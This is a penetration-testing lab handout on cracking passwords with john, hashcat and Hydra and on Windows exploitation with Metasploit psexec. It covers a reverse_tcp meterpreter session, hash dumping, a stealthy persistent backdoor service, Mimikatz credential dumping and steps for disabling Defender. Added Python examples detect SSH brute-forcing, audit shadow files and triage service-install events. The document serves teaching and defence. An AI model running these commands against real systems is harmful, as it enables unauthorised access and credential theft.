
Please follow the instructions given in the slides below. When you have completed them, send me the lab9.lst file. Referencing is not necessary; the deadline is flexible too.


Penetration Testing Lab - Passwords and Exploits
©2020 NYU Tandon School of Engineering

Password and Authentication Lab

Labs:
  - Building a dictionary with John the Ripper
  - Using Hydra to guess passwords
  - Dumping Windows hashes with the PSExec exploit, Meterpreter and Mimikatz
  - Exploits: creating a persistent backdoor; routing through other hosts to attack

Note: This lab assumes you have completed the previous lab and have access to a Windows machine, either a VM or your host machine. You will be making changes to user accounts.

Building a Password Dictionary List

Lab Setup & Goal
For this lab, we will use an existing password list and make a new password list from it. We will then try to use a tool to guess the password of the IEUser account. If you are using your own Windows instance, you will need to enable SMB. Also, create a new user and give it the password "Passw0rd!".

WARNING: These password lists have profanity in them. If you are offended by vulgar language, you may want to skip this section or avoid looking at the password files (don't cat the raw files).

Making a dictionary with pw-inspector
We will use an existing password file as a seed for our new list: /usr/share/wordlists/nmap.lst
Inspect the wordlist with cat. We can pipe it right into pw-inspector; we can also use '-i' to read in a file.
Use pw-inspector to print passwords that are:
  - at least 6 characters long but no more than 10 characters
  - made up of at least 2 of the following three categories: lowercase, uppercase, numbers
Create a new dictionary file called lab9.lst with the following rules:
  - between 8 and 10 characters
  - must use both upper and lower case characters

Making a dictionary with pw-inspector - Answer
Print passwords of 6-10 characters using at least 2 of the 3 categories (lowercase, uppercase, numbers):
# cat nmap.lst | pw-inspector -m 6 -M 10 -l -u -n -c 2
Create lab9.lst with 8-10 characters that use both upper and lower case:
# cat nmap.lst | pw-inspector -m 8 -M 10 -l -u > lab9.lst

John the Ripper
John the Ripper is a multi-purpose tool for password cracking. We can also use it to help mangle our passwords. We will cover more of this tool the following week. If we just call "john" from the command line, it will show us its options.

John the Ripper - for password mangling
Cat our new password file. Pretty short!
Clear the screen:
# clear
Try the following command:
# john --wordlist:./lab9.lst --rules:single --stdout
This command will call John, pass it our new wordlist, specify the mangling rule 'single', and tell it to print to stdout.
We can get a list of all available rules with:
# john --list=rules

John the Ripper - for password mangling
Using our small seed file and john, use a rule that mangles the dictionary entries into various forms of "leetspeak" (converts i -> 1, e -> 3, etc.).
Hint: uS1N' 0UR sm4Ll S33d F1L3 4nD J0Hn, UZ3 4 RUL3 TH@ m4NGl3z T3H d1cT10N4RY 3NTR13z 1nT0 v4R10Uz F0rMZ 0F l33t sp33k

Spoiler ahead

John the Ripper - for password mangling - Answer
# john --wordlist:./lab9.lst --rules:l33t --stdout >> lab9.lst

Password Guessing with Hydra

Setup
You may have to go into the Windows Network Settings and enable File and Print Sharing. It depends on what kind of network connection you select; for a Public network it needs to be manually enabled.
You will need to enable SMBv1. Use the "Turn Windows Features..." panel. Confirm with nmap if needed.
Also, if this is the VM, you will already have the firewall disabled. If you disable it on your host system, make sure to enable it again after the lab.

Hydra for guessing passwords
Refer again to the options by running hydra with no arguments:
# hydra
Review the options and the example at the bottom right of the screen. Use hydra with our new lab9.lst dictionary to attack the SMB server of the Windows target. Once that has completed, try it again using the 'xhydra' GUI tool.
Hint: You will not need to specify options such as the port. By specifying a service, hydra automatically provides the settings.

Spoiler ahead

Hydra for guessing passwords - Answer
# hydra -l IEUser -P lab9.lst smb://10.10.0.5

Password guessing noise - demonstrated - Setup
Now let's see how noisy password guessing can be.
Start your Kali Linux SSH server:
# service ssh start
We can verify that it is running:
# service ssh status
# nmap -n 127.0.0.1 -p 22
Create a new user alice:
# adduser alice
Change her password to 'Passw0rd!':
# passwd alice
Open a new Terminal window. Print the recent auth logs and follow them:
# tail -f /var/log/auth.log

Password guessing noise - demonstrated
Run hydra against the local machine to guess alice's ssh password:
  Target  - 127.0.0.1
  Service - ssh
  User    - alice
Use the same dictionary file, lab9.lst. As you do this, watch the log window we set up!

Spoiler ahead

Password guessing noise - demonstrated - Answer
# hydra -l alice -P lab9.lst ssh://127.0.0.1
Many system log entries about failed authentication. It is VERY OBVIOUS that someone is trying to guess the password!
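The slide above makes the defender's point: a wordlist attack against sshd produces a burst of "Failed password" lines in /var/log/auth.log. The following Python is an added example, not part of the lab or of any tool it names, that turns that observation into a small detector: it parses sshd syslog lines, counts failures per source address inside a sliding window, and also flags a success that follows such a burst (the case where the guess worked). The log lines are constructed to resemble what tail -f shows while hydra runs; the threshold, window size and year are assumptions you would tune for your own hosts.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in sshd's syslog format (addresses, PIDs and ports are made up).
SAMPLE_AUTH_LOG = """\
Apr  5 10:00:01 kali sshd[2311]: Failed password for alice from 127.0.0.1 port 40211 ssh2
Apr  5 10:00:01 kali sshd[2313]: Failed password for alice from 127.0.0.1 port 40212 ssh2
Apr  5 10:00:02 kali sshd[2315]: Failed password for alice from 127.0.0.1 port 40213 ssh2
Apr  5 10:00:02 kali sshd[2317]: Failed password for invalid user admin from 127.0.0.1 port 40214 ssh2
Apr  5 10:00:03 kali sshd[2319]: Failed password for alice from 127.0.0.1 port 40215 ssh2
Apr  5 10:00:03 kali sshd[2321]: Failed password for alice from 127.0.0.1 port 40216 ssh2
Apr  5 10:00:04 kali sshd[2323]: Accepted password for alice from 127.0.0.1 port 40217 ssh2
Apr  5 10:05:00 kali sshd[2400]: Failed password for bob from 10.10.0.7 port 51000 ssh2
Apr  5 10:07:30 kali sshd[2402]: Accepted publickey for bob from 10.10.0.7 port 51001 ssh2
"""

# Matches both "Failed password for <user>" and "Failed password for invalid user <user>".
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_events(text, year=2023):
    """Return (timestamp, result, user, ip) tuples for every sshd auth line.

    Syslog timestamps carry no year, so one is assumed (parameter)."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated daemon or a line we do not model
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=year)
        events.append((ts, m["result"], m["user"], m["ip"]))
    return events


def detect_bruteforce(events, threshold=5, window_seconds=60):
    """Sliding-window detector.

    Emits ('burst', ip, count) once a source reaches `threshold` failures
    within `window_seconds`, and ('success_after_burst', ip, user) when a
    login from that source succeeds while the burst is still in the window."""
    recent = defaultdict(list)  # ip -> timestamps of failures still in the window
    flagged = set()
    alerts = []
    for ts, result, user, ip in sorted(events, key=lambda e: e[0]):
        fails = recent[ip]
        # Expire failures that fell out of the window.
        while fails and (ts - fails[0]).total_seconds() > window_seconds:
            fails.pop(0)
        if result == "Failed":
            fails.append(ts)
            if len(fails) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("burst", ip, len(fails)))
        elif result == "Accepted" and ip in flagged and fails:
            alerts.append(("success_after_burst", ip, user))
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(parse_events(SAMPLE_AUTH_LOG)):
        print(alert)
```

Counting by source address rather than by user name is deliberate: the sample shows the same source also probing a non-existent account ("invalid user admin"), which a per-user counter would treat as a separate, harmless event. The "success after burst" alert is the one worth paging on, because it means a weak password such as those in lab9.lst was actually found.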
Password Cracking

For this lab, we will create some users on our Kali VM and then try to crack their passwords. We will use the nmap.lst wordlist.
On your Kali machine, add the following users and set each one's password when adduser prompts for it:
# adduser alice      (password: spongebob)
# adduser bob        (password: junior56)
# adduser charlie    (password: Liv3rp00l)
# adduser dan        (password: $ofTBa11!999)

John
Use john against the shadow file to try to crack the passwords. Use simple wordlist mode with nmap.lst. Repeat with our mangled wordlist, lab9.lst.

Spoiler ahead

John - Answer
# john --wordlist=/usr/share/wordlists/nmap.lst /etc/shadow
# john --wordlist=./lab9l33t.lst /etc/shadow

Hashcat
The input for hashcat is a bit different: we can't just pass it the shadow file (it stops with an ERROR). First, extract just the hashes from the shadow file. Don't use a text editor; do use bash commands and tools such as grep and awk. Write the contents to a file, hashes.lst.

Spoiler ahead

Hashcat - awk solution
# cat /etc/shadow | grep '\$' | awk -F':' '{print $2 }' > hashes.lst

Hashcat
Next, use hashcat in hybrid wordlist + mask mode to attack the hashes:
  wordlist = nmap.lst
  mask     = two digits
Force it to run if it cannot use a GPU (virtualized Kali). Output should go to a file called hashes.out.
OPTIONAL: To speed up this lab, shorten the standard nmap.lst. Pull out the entries that contain the string "juni" into a shorter list in your working directory:
# cat /usr/share/wordlists/nmap.lst | grep 'juni' > nmap_short.lst

Spoiler ahead

Hashcat - Answer
# hashcat -a 6 -m 1800 hashes.lst nmap_short.lst ?d?d --force -o hashes.out

The last password
Use a combination of John and hashcat to try to get the last password. Assume that we have a hint: Dan loves softball more than anything. With "softball" as a seed, what is one way to mangle this to make a wordlist? You could use john rulesets such as l33t, and add digits and case shifts using hashcat. Read the documentation and practice each. Try to crack it.

Dumping Windows hashes - PSExec

Metasploit - Meterpreter Lab
For this lab, we will use a meterpreter session on the Windows target to get hashes and practice some password cracking techniques.

Metasploit - Meterpreter Getting Hashes - Setup (Windows)
Open up an administrative command shell. Make a registry change to allow psexec to execute files:
C:\> reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
Disable the firewall:
C:\> netsh advfirewall set allprofiles state off
Open up an administrative PowerShell and disable Windows Defender real-time monitoring:
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true

Metasploit - Meterpreter Getting Hashes
We will use the metasploit database, so make sure postgresql is started and the msfdb is initialized. Start metasploit; you can check the status of the database with 'db_connect' and 'db_status'. Load the exploit that works against Windows SMB when you already have a username and password: psexec. Set all required options to use the exploit. Set a payload for a reverse tcp meterpreter session.

Spoiler ahead

Metasploit - Meterpreter Getting Hashes - Answer
# msfconsole
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(psexec) > set RHOST 10.10.0.5
msf exploit(psexec) > set SMBPass Passw0rd!
msf exploit(psexec) > set SMBUser IEUser
msf exploit(psexec) > set LHOST 10.10.0.10
msf exploit(psexec) > exploit
meterpreter >

Metasploit - Meterpreter Getting Hashes
Now that we have a Meterpreter session, let's try some basic commands.
Check our user:
meterpreter > getuid
Even though we are already SYSTEM, there still might be some privileges to get; there are configurations which can limit system or admin accounts. Gain more privileges:
meterpreter > getprivs
Hashdump has been deprecated and replaced with smart_hashdump:
meterpreter > run post/windows/gather/smart_hashdump
You can also see that it updated the loot table. Send our session to the background:
meterpreter > background
Check our loot table:
msf > loot
We will attack these hashes in another lab.

Persistent Backdoor Service

This next lab will pick up right where we left off. Still using the psexec exploit, we will dive into more settings and create a persistent backdoor. If the VM gets shut down or restarts, we will not need to exploit PSExec again; we only need to create a listener!

Metasploit - Meterpreter - psexec settings
By default, after exploit, we can see what process meterpreter is in:
meterpreter > ps        (lists all processes)
meterpreter > getpid    (shows the PID of the process meterpreter is running in)
Check out some advanced options of the exploit:
msf exploit(psexec) > show advanced
Interesting stuff here, including SERVICE_PERSIST. Set it to true:
msf exploit(psexec) > set SERVICE_PERSIST true
This will create a persistent service on the target machine. By default, it will create it with some random characters, but we can define them. Make it more stealthy! Set those values to whatever you want for this lab, then exploit.
Look at the Windows Task Manager, Services tab.

Even though we created a persistent service to reconnect to us, we also need to create a listener! Set a new exploit, a multi-handler:
msf > use exploit/multi/handler
Set the payload:
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
Check your options: LPORT = 4444, LHOST = 10.10.0.10
Exploit, but send it to the background:
msf exploit(handler) > exploit -j
It will listen for incoming connections!

Close all current sessions:
msf > sessions -K
Check the current jobs:
msf > jobs
We can see that there are no more sessions, but our multi-handler is listening...

Power down and restart the VM. If you are using your own Windows client, you could just manually start the service. Watch your metasploit console. As Windows starts back up, the service runs! The multi-handler gets the backdoor reverse_tcp connection request and successfully sends over the Meterpreter stage. We now have a new meterpreter session on a freshly booted Windows machine. Our job ended.

Mimikatz & Ophcrack

In the existing meterpreter session, load Mimikatz!
meterpreter > load kiwi
meterpreter > creds_all
We can see what other commands we can run with ?:
meterpreter > ?

Command          Description
-------          -----------
creds_all        Retrieve all credentials (parsed)
creds_kerberos   Retrieve Kerberos creds (parsed)
creds_msv        Retrieve LM/NTLM creds (parsed)
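The awk one-liner in the Hashcat section pulls the second field of every /etc/shadow line that contains a '$'. The following Python is an added example (not part of the lab or of hashcat/john) that parses the same file format properly, so the lab's extraction step can be checked and, more usefully for an administrator, the file can be audited: which hash algorithm each account uses, which accounts are locked, and which have an empty password field. The shadow excerpt is constructed (fake salts and truncated hashes); the algorithm-id table covers the common crypt(3) prefixes, and the "weak" classification of md5crypt is this example's own policy choice.

```python
# crypt(3) algorithm identifiers as they appear between the first two '$'.
# $6$ (sha512crypt) is what the lab's "hashcat -m 1800" targets.
HASH_ALGOS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt",
              "7": "scrypt", "y": "yescrypt", "2b": "bcrypt", "2y": "bcrypt"}
WEAK_ALGOS = {"md5crypt"}  # policy choice: legacy, fast to attack

# Constructed /etc/shadow excerpt: fake salts, truncated hashes.
SAMPLE_SHADOW = """\
root:$6$saltsalt$0123456789abcdef:19452:0:99999:7:::
alice:$y$j9T$saltsaltsaltsalt$fedcba9876543210:19452:0:99999:7:::
bob:$1$saltsalt$0011223344556677:19452:0:99999:7:::
charlie:!$6$saltsalt$8899aabbccddeeff:19452:0:99999:7:::
dan::19452:0:99999:7:::
daemon:*:19452:0:99999:7:::
"""


def parse_shadow(text):
    """Return (user, password_field) pairs; other fields are ignored here."""
    rows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue  # malformed line; a real audit would report it
        rows.append((fields[0], fields[1]))
    return rows


def classify(pw_field):
    """Describe a shadow password field: algorithm, lock state, or emptiness."""
    if pw_field == "":
        return "no-password"
    if pw_field in ("*", "!", "!!"):
        return "locked-no-hash"
    locked = pw_field.startswith("!")   # "!" prefix = account locked by passwd -l
    h = pw_field.lstrip("!")
    if not h.startswith("$"):
        return "unknown"
    algo_id = h.split("$")[1]
    algo = HASH_ALGOS.get(algo_id, "unknown($%s$)" % algo_id)
    return ("locked:" if locked else "") + algo


def extract_hashes(text, include_locked=False):
    """Equivalent of the lab's grep '\\$' | awk '{print $2}' step.

    Locked accounts keep a crackable hash behind the '!' prefix; they are
    skipped by default, and the prefix is stripped if they are included,
    since cracking tools reject the raw "!$6$..." form."""
    out = []
    for _user, field in parse_shadow(text):
        if "$" not in field:
            continue
        if field.startswith("!"):
            if not include_locked:
                continue
            field = field.lstrip("!")
        out.append(field)
    return out


def audit_shadow(text):
    """Findings an administrator acts on: (user, severity, message)."""
    findings = []
    for user, field in parse_shadow(text):
        kind = classify(field)
        if kind == "no-password":
            findings.append((user, "CRITICAL",
                             "empty password field: login without a password "
                             "is possible where PAM allows nullok"))
        elif kind.split(":")[-1] in WEAK_ALGOS:
            findings.append((user, "WARN",
                             "legacy %s hash: rehash with a modern algorithm" % kind))
    return findings


if __name__ == "__main__":
    for user, field in parse_shadow(SAMPLE_SHADOW):
        print("%-8s %s" % (user, classify(field)))
    for finding in audit_shadow(SAMPLE_SHADOW):
        print(finding)
```

Two details are easy to miss with the one-liner: a locked account ("!$6$...") still matches grep '\$' but is not a valid hash for hashcat until the '!' is removed, and an account with an empty field matches nothing at all, so it silently disappears from hashes.lst even though it is the most serious finding in the file.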
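The persistence section notes that the service name is attacker-chosen ("make it more stealthy"), so a defender cannot rely on spotting odd service names. What cannot be hidden as easily is the event Windows writes for every new service (System log, source Service Control Manager, event ID 7045) and the location of the service binary: psexec-style tools copy their executable into the ADMIN$ share, which is the Windows directory itself, not System32. The following Python is an added example (not part of the lab or of Metasploit) that triages 7045 events on those grounds. The events are constructed dictionaries whose keys mirror the event's Service Name / Service File Name / Service Type / Service Start Type / Service Account fields; the trusted-directory list is an assumption to adapt to your build.

```python
import ntpath

WINDOWS_ROOT = r"c:\windows"                       # ADMIN$ maps here
TRUSTED_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64",
                r"c:\program files", r"c:\program files (x86)")
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\", "\\appdata\\")

# Constructed 7045 events; names and paths are made up for the example.
SAMPLE_7045 = [
    {"service_name": "ylKvQnXTmdaW", "image_path": r"C:\Windows\ylKvQnXTmdaW.exe",
     "service_type": "user mode service", "start_type": "auto start",
     "account": "LocalSystem"},
    {"service_name": "VendorBackupAgent",
     "image_path": r'"C:\Program Files\Vendor\agent.exe" --service',
     "service_type": "user mode service", "start_type": "auto start",
     "account": "LocalSystem"},
    {"service_name": "UpdateHelper", "image_path": r"C:\Users\Public\helper.exe",
     "service_type": "user mode service", "start_type": "demand start",
     "account": "LocalSystem"},
    {"service_name": "mydrv", "image_path": r"\SystemRoot\System32\drivers\mydrv.sys",
     "service_type": "kernel mode driver", "start_type": "auto start",
     "account": ""},
]


def image_from_path(image_path):
    """Reduce a Service File Name value to a normalised, lower-case image path.

    Handles quoted paths with arguments, the \\SystemRoot and %SystemRoot%
    forms used by drivers, and the \\??\\ NT prefix. Unquoted paths that
    contain spaces are a known limitation of this simple splitter."""
    p = image_path.strip()
    if p.startswith('"') and '"' in p[1:]:
        p = p[1:p.find('"', 1)]
    else:
        p = p.split(" ")[0]
    p = p.replace("\\SystemRoot", "C:\\Windows").replace("%SystemRoot%", "C:\\Windows")
    p = p.replace("\\??\\", "")
    return p.lower()


def flag_service(evt):
    """Return the list of reasons this service installation deserves review."""
    reasons = []
    img = image_from_path(evt["image_path"])
    if img.startswith("\\\\"):
        reasons.append("image loaded from a network share")
    if ntpath.dirname(img) == WINDOWS_ROOT:
        reasons.append("image dropped directly in the Windows root (ADMIN$ share)")
    if any(marker in img for marker in USER_WRITABLE):
        reasons.append("image in a user-writable location")
    if not reasons and not img.startswith(TRUSTED_DIRS):
        reasons.append("image outside System32/Program Files")
    if reasons and evt["start_type"] == "auto start":
        reasons.append("auto-start: survives reboot (persistence)")
    return reasons


def triage(events):
    """(service name, reasons) for every event that raised at least one reason."""
    flagged = []
    for evt in events:
        reasons = flag_service(evt)
        if reasons:
            flagged.append((evt["service_name"], reasons))
    return flagged


if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_7045):
        print(name)
        for r in reasons:
            print("   -", r)
```

The first sample event is the shape the lab's SERVICE_PERSIST setting produces on the target: an auto-start service running as LocalSystem whose binary sits in C:\Windows rather than in System32, which is why the path check, not the name, is the reliable signal. Forwarding 7045 (and Security event 4697 where service-installation auditing is enabled) to a central log store is what makes this check useful in practice, since the page's setup steps also show the local defences being switched off.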
Apr 05, 2023